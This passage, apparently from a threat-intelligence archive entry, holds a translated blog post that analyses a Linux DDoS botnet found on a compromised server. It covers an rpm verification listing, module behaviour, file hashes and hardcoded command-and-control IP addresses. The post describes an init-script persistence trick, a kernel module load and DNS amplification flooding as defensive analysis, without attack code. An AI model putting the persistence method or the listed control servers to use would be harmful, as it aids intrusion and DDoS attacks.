/usr/share/cacti/include/treeview/ftv2plastnode.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2pnode.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2vertline.gif\r\n.M....... /usr/share/cacti/include/treeview/ua.js\r\n.M....... /usr/share/cacti/include/zoom.js\r\n.M....... /usr/share/cacti/index.php\r\n.M....... /usr/share/cacti/install\r\n.M....... /usr/share/cacti/install/0_8_1_to_0_8_2.php\r\n.M....... /usr/share/cacti/install/0_8_2_to_0_8_2a.php\r\n.M....... /usr/share/cacti/install/0_8_2a_to_0_8_3.php\r\n.M....... /usr/share/cacti/install/0_8_3_to_0_8_4.php\r\n.M....... /usr/share/cacti/install/0_8_4_to_0_8_5.php\r\n.M....... /usr/share/cacti/install/0_8_5a_to_0_8_6.php\r\n.M....... /usr/share/cacti/install/0_8_6_to_0_8_6a.php\r\n.M....... /usr/share/cacti/install/0_8_6c_to_0_8_6d.php\r\n.M....... /usr/share/cacti/install/0_8_6d_to_0_8_6e.php\r\n.M....... /usr/share/cacti/install/0_8_6f_to_0_8_6g.php\r\n.M....... /usr/share/cacti/install/0_8_6g_to_0_8_6h.php\r\n.M....... /usr/share/cacti/install/0_8_6h_to_0_8_6i.php\r\n.M....... /usr/share/cacti/install/0_8_6j_to_0_8_7.php\r\n.M....... /usr/share/cacti/install/0_8_7_to_0_8_7a.php\r\n.M....... /usr/share/cacti/install/0_8_7a_to_0_8_7b.php\r\n.M....... /usr/share/cacti/install/0_8_7b_to_0_8_7c.php\r\n.M....... /usr/share/cacti/install/0_8_7c_to_0_8_7d.php\r\n.M....... /usr/share/cacti/install/0_8_7d_to_0_8_7e.php\r\n.M....... /usr/share/cacti/install/0_8_7e_to_0_8_7f.php\r\n.M....... /usr/share/cacti/install/0_8_7f_to_0_8_7g.php\r\n.M....... /usr/share/cacti/install/0_8_7g_to_0_8_7h.php\r\n.M....... /usr/share/cacti/install/0_8_7h_to_0_8_7i.php\r\n.M....... /usr/share/cacti/install/0_8_7i_to_0_8_8.php\r\n.M....... /usr/share/cacti/install/0_8_8_to_0_8_8a.php\r\n.M....... /usr/share/cacti/install/0_8_to_0_8_1.php\r\n.M....... /usr/share/cacti/install/index.php\r\n.M....... /usr/share/cacti/install/install_finish.gif\r\n.M....... 
/usr/share/cacti/install/install_next.gif\r\n.M....... /usr/share/cacti/lib\r\n.M....... /usr/share/cacti/lib/adodb\r\n.M....... /usr/share/cacti/lib/adodb/adodb-csvlib.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-datadict.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-error.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-errorhandler.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-errorpear.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-exceptions.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-iterator.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-lib.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-pear.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-perf.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-php4.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-time.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-xmlschema.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-access.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-db2.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-firebird.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-generic.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-ibase.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-informix.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-mssql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-mysql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-oci8.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-postgres.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-sapdb.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-sybase.inc.php\r\n.M....... 
/usr/share/cacti/lib/adodb/drivers\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-access.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ado.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ado5.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ado_access.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ado_mssql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-borland_ibase.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-csv.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-db2.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-fbsql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-firebird.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ibase.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-informix.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-informix72.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ldap.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-mssql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-mssqlpo.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-mysql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-mysqli.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-mysqlt.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-netezza.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-oci8.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-oci805.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-oci8po.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-odbc.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-odbc_mssql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-odbc_oracle.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-odbtp.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-odbtp_unicode.inc.php\r\n.M....... 
/usr/share/cacti/lib/adodb/drivers/adodb-oracle.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-pdo.inc.php\r\nhttps://habrahabr.ru/post/213973/\r\nPage 14 of 24\n\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-postgres.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-postgres64.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-postgres7.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-proxy.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-sapdb.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-sqlanywhere.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-sqlite.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-sqlitepo.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-sybase.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-vfp.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-ar.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-bg.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-bgutf8.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-ca.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-cn.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-cz.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-de.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-en.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-es.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-fr.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-hu.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-it.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-nl.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-pl.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-pt-br.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-ro.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-ru1251.inc.php\r\n.M....... 
/usr/share/cacti/lib/adodb/lang/adodb-sv.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/license.txt\r\n.M....... /usr/share/cacti/lib/adodb/toexport.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/tohtml.inc.php\r\n.M....... /usr/share/cacti/lib/api_automation_tools.php\r\n.M....... /usr/share/cacti/lib/api_data_source.php\r\n.M....... /usr/share/cacti/lib/api_device.php\r\n.M....... /usr/share/cacti/lib/api_graph.php\r\n.M....... /usr/share/cacti/lib/api_poller.php\r\n.M....... /usr/share/cacti/lib/api_tree.php\r\n.M....... /usr/share/cacti/lib/auth.php\r\n.M....... /usr/share/cacti/lib/cdef.php\r\n.M....... /usr/share/cacti/lib/data_query.php\r\n.M....... /usr/share/cacti/lib/database.php\r\n.M....... /usr/share/cacti/lib/export.php\r\n.M....... /usr/share/cacti/lib/functions.php\r\n.M....... /usr/share/cacti/lib/graph_export.php\r\n.M....... /usr/share/cacti/lib/graph_variables.php\r\n.M....... /usr/share/cacti/lib/html.php\r\nhttps://habrahabr.ru/post/213973/\r\nPage 15 of 24\n\n.M....... /usr/share/cacti/lib/html_form.php\r\n.M....... /usr/share/cacti/lib/html_form_template.php\r\n.M....... /usr/share/cacti/lib/html_tree.php\r\n.M....... /usr/share/cacti/lib/html_utility.php\r\n.M....... /usr/share/cacti/lib/html_validate.php\r\n.M....... /usr/share/cacti/lib/import.php\r\n.M....... /usr/share/cacti/lib/ldap.php\r\n.M....... /usr/share/cacti/lib/ping.php\r\n.M....... /usr/share/cacti/lib/plugins.php\r\n.M....... /usr/share/cacti/lib/poller.php\r\n.M....... /usr/share/cacti/lib/rrd.php\r\n.M....... /usr/share/cacti/lib/snmp.php\r\n.M....... /usr/share/cacti/lib/sort.php\r\n.M....... /usr/share/cacti/lib/template.php\r\n.M....... /usr/share/cacti/lib/time.php\r\n.M....... /usr/share/cacti/lib/timespan_settings.php\r\n.M....... /usr/share/cacti/lib/tree.php\r\n.M....... /usr/share/cacti/lib/utility.php\r\n.M....... /usr/share/cacti/lib/variables.php\r\n.M....... /usr/share/cacti/lib/xml.php\r\n.M....... /usr/share/cacti/logout.php\r\n.M....... 
/usr/share/cacti/plugins\r\n.M....... /usr/share/cacti/plugins.php\r\n.M....... /usr/share/cacti/plugins/index.php\r\n.M....... /usr/share/cacti/poller.php\r\n.M....... /usr/share/cacti/poller_commands.php\r\n.M....... /usr/share/cacti/poller_export.php\r\n.M....... /usr/share/cacti/resource\r\n.M....... /usr/share/cacti/resource/script_queries\r\n.M....... /usr/share/cacti/resource/script_queries/host_cpu.xml\r\n.M....... /usr/share/cacti/resource/script_queries/host_disk.xml\r\n.M....... /usr/share/cacti/resource/script_queries/unix_disk.xml\r\n.M....... /usr/share/cacti/resource/script_server\r\n.M....... /usr/share/cacti/resource/script_server/host_cpu.xml\r\n.M....... /usr/share/cacti/resource/script_server/host_disk.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries\r\n.M....... /usr/share/cacti/resource/snmp_queries/host_disk.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries/interface.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries/kbridge.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries/net-snmp_disk.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries/netware_cpu.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries/netware_disk.xml\r\n.M....... /usr/share/cacti/rra.php\r\n.M....... /usr/share/cacti/script_server.php\r\n.M....... /usr/share/cacti/settings.php\r\n.M....... /usr/share/cacti/templates_export.php\r\n.M....... /usr/share/cacti/templates_import.php\r\nhttps://habrahabr.ru/post/213973/\r\nPage 16 of 24\n\n.M....... /usr/share/cacti/tree.php\r\n.M....... /usr/share/cacti/user_admin.php\r\n.M....... /usr/share/cacti/utilities.php\r\n.M....... /var/lib/cacti\r\n.M....... /var/lib/cacti/cli\r\n.M....... /var/lib/cacti/cli/add_data_query.php\r\n.M....... /var/lib/cacti/cli/add_device.php\r\n.M....... /var/lib/cacti/cli/add_graph_template.php\r\n.M....... /var/lib/cacti/cli/add_graphs.php\r\n.M....... /var/lib/cacti/cli/add_perms.php\r\n.M....... /var/lib/cacti/cli/add_tree.php\r\n.M....... 
/var/lib/cacti/cli/analyze_database.php\r\n.M....... /var/lib/cacti/cli/convert_innodb.php\r\n.M....... /var/lib/cacti/cli/copy_user.php\r\n.M....... /var/lib/cacti/cli/data_template_associate_rra.php\r\n.M....... /var/lib/cacti/cli/host_update_template.php\r\n.M....... /var/lib/cacti/cli/import_template.php\r\n.M....... /var/lib/cacti/cli/poller_data_sources_reapply_names.php\r\n.M....... /var/lib/cacti/cli/poller_graphs_reapply_names.php\r\n.M....... /var/lib/cacti/cli/poller_output_empty.php\r\n.M....... /var/lib/cacti/cli/poller_reindex_hosts.php\r\n.M....... /var/lib/cacti/cli/rebuild_poller_cache.php\r\n.M....... /var/lib/cacti/cli/reorder_data_query.php\r\n.M....... /var/lib/cacti/cli/repair_database.php\r\n.M....... /var/lib/cacti/cli/repair_templates.php\r\n.M....... /var/lib/cacti/cli/structure_rra_paths.php\r\n.M....... /var/lib/cacti/cli/upgrade_database.php\r\n.M....... /var/lib/cacti/rra\r\n.M....... /var/lib/cacti/scripts\r\n.M....... /var/lib/cacti/scripts/3com_cable_modem.pl\r\n.M....... /var/lib/cacti/scripts/diskfree.pl\r\n.M....... /var/lib/cacti/scripts/diskfree.sh\r\n.M....... /var/lib/cacti/scripts/linux_memory.pl\r\n.M....... /var/lib/cacti/scripts/loadavg.pl\r\n.M....... /var/lib/cacti/scripts/loadavg_multi.pl\r\n.M....... /var/lib/cacti/scripts/ping.pl\r\n.M....... /var/lib/cacti/scripts/query_host_cpu.php\r\n.M....... /var/lib/cacti/scripts/query_host_partitions.php\r\n.M....... /var/lib/cacti/scripts/query_unix_partitions.pl\r\n.M....... /var/lib/cacti/scripts/sql.php\r\n.M....... /var/lib/cacti/scripts/ss_fping.php\r\n.M....... /var/lib/cacti/scripts/ss_host_cpu.php\r\n.M....... /var/lib/cacti/scripts/ss_host_disk.php\r\n.M....... /var/lib/cacti/scripts/ss_sql.php\r\n.M....... /var/lib/cacti/scripts/unix_processes.pl\r\n.M....... /var/lib/cacti/scripts/unix_tcp_connections.pl\r\n.M....... /var/lib/cacti/scripts/unix_users.pl\r\nhttps://habrahabr.ru/post/213973/\r\nPage 17 of 24\n\n.M....... 
/var/lib/cacti/scripts/weatherbug.pl\r\n.M....... /var/lib/cacti/scripts/webhits.pl\r\nS.5....T. /var/log/cacti/cacti.log\r\nS.5....T. c /etc/ntop.conf\r\n.......T. c /etc/avahi/hosts\r\nS.5....T. c /etc/netatalk/AppleVolumes.default\r\nS.5....T. c /etc/netatalk/afpd.conf\r\nS.5....T. c /etc/netatalk/netatalk.conf\r\nS.5....T. c /etc/httpd/conf.d/nagios.conf\r\nS.5....T. c /etc/nagios/nagios.cfg\r\nS.5....T. c /etc/nagios/objects/commands.cfg\r\nS.5....T. c /etc/nagios/objects/localhost.cfg\r\nS.5....T. c /etc/sysconfig/ntpd\r\nS.5....T. c /etc/profile\r\nSM5..UGT. c /etc/snmp/snmpd.conf\r\nS.5....T. c /etc/sysconfig/iptables-config\r\n.......T. c /etc/avahi/avahi-dnsconfd.action\r\nS.5....T. c /etc/dnsmasq.conf\r\nThis means that no system files were modified. Since the processes on the system were not hidden, I assumed that no rootkits were used here, and it can be said with some confidence that the system is clean.\r\nSearching for information about the botnet\r\nFirst, I started looking for any information about this botnet, searching by the domain name, the file names and the lines from crontab.\r\nSome information turned up right away:\r\nMy home PC has been 0wn3d :( @ forums.debian.net\r\nWhat do sapd, skysapd, sksapd, and ksapd do? 
@ askubuntu.com\r\nI Got Myself Hacked @ hackervisions.org\r\nSuspected rootkit @ archlinuxarm.org\r\nOverall, nothing interesting or new.\r\nExamining the botnet files\r\nFirst, I used the file utility to learn more about these executables:\r\natddd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\ncupsdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\ncupsddh: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped\r\nksapdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\nkysapdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\nskysapdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\nxfsdxd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\nNot stripped! What a surprise!\r\nFor some reason I took a liking to the cupsdd file, and I loaded it first rather than atddd. I don't know why myself, but it was exactly the right choice.\r\nGates\r\nSo, cupsdd is the \"Gates\" module. md5 603170ad361f6e098c8681ed264155eb, sha1 1714fd31cc931e2a0eb97d25a076567af45dc6d8\r\nWhat does it do, and why is it \"Gates\"? 
Well, IDA Pro, for example, can answer that for us.\r\nWhat does this module do?\r\nTries to initialize itself\r\nUnpacks the RSA data; in my case it was the string:\r\n116.10.189.246:30000:1:1:h:578856:579372:579888\r\nIts fields are assigned to variables as follows:\r\ng_strConnTgt=116.10.189.246\r\ng_iGatsPort=30000\r\ng_iGatsIsFx=1\r\ng_iIsService=1\r\ng_strBillTail=h\r\ng_strCryptStart=578856\r\ng_strDStart=579372\r\ng_strNStart=579888\r\nThe last three parameters are needed to locate the three RSA strings when the modules are updated.\r\nTries to install the \"Bill\" module\r\nChecks whether it is already running by binding port 10808. If the bind succeeds, it is not running. If not, the process whose PID is stored in the lock file /tmp/bill.lock is killed\r\nFinds the path where the current exe is stored by reading /proc/%d/exe, extracts the path, appends 'BillTail', decrypted in step 1 (in my case it was 'h'), opens it for writing and writes a file there, starting at offset 0xB1728 with a size of 335872.\r\nForks and runs the new file.\r\nCalls the daemon() function, which rebinds the current stdin, stdout and stderr to /dev/null\r\nChecks whether it (the \"Gates\" module) is already running by checking the file /tmp/gates.lock. If it is running, Gates exits.\r\nAdds the unpacked \"Bill\" module to sysvinit autostart by creating the simplest possible init script in /etc/init.d/ named \"DbSecuritySpt\", of the form:\r\n#!/bin/bash\r\n/path/to/bill\r\nAnd creates symlinks to it at /etc/rc[1-5].d/97DbSecuritySpt.\r\nThe MainProcess() function is started\r\nReads basic information about the system, CPU, RAM, network cards and hard drives.\r\nBill\r\nThe \"Bill\" module is the DDoS module. Packed with UPX. 
In my case it was named \"cupsddh\", md5 7fb3dce23d290166c7e52644b16faae6, sha1 98db5a311118c78d97aa514db7d8277535544926\r\nCan attack hosts over TCP, UDP and ICMP, and by DNS amplification. Can limit its own CPU usage, reconfigure itself on the fly, and update itself.\r\nReads basic information about the system, CPU, RAM, network cards and hard drives.\r\nReads DNS information.\r\nRuns system(\"insmod /usr/lib/xpacket.ko\")\r\nWhen updating itself, writes itself to /usr/lib/libamplify.so\r\nStarts listening on 127.0.0.1:10808. Can receive both a config from the main module and attack commands.\r\nThe \"phone-home\" module\r\nThe ksapdd file is some kind of module that sends statistics and information to the main servers. The server and port are hardcoded in the program. In my case they were 121.12.110.96:10991, which are trivially decoded.\r\nThe files kysapdd, skysapdd, xfsdxd and atddd are copies of ksapdd, but the first connects to 112.90.252.76:10991, the second to 112.90.22.197:10991, the third to 116.10.189.246:10991, and the fourth to 202.103.178.76:10991\r\nConclusion\r\nWell, that's all. It came out somewhat superficial, but the control servers flatly refuse to send commands to my instances, and nothing happens. Take care of your servers.\r\nrghost.ru/52680741: all the botnet files are here.\r\nSource: https://habrahabr.ru/post/213973/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://habrahabr.ru/post/213973/"
	],
	"report_names": [
		"213973"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775438992,
	"ts_updated_at": 1775826735,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b40690b5aa64a997e15007ad8094a99cc8d1c1dd.pdf",
		"text": "https://archive.orkl.eu/b40690b5aa64a997e15007ad8094a99cc8d1c1dd.txt",
		"img": "https://archive.orkl.eu/b40690b5aa64a997e15007ad8094a99cc8d1c1dd.jpg"
	}
}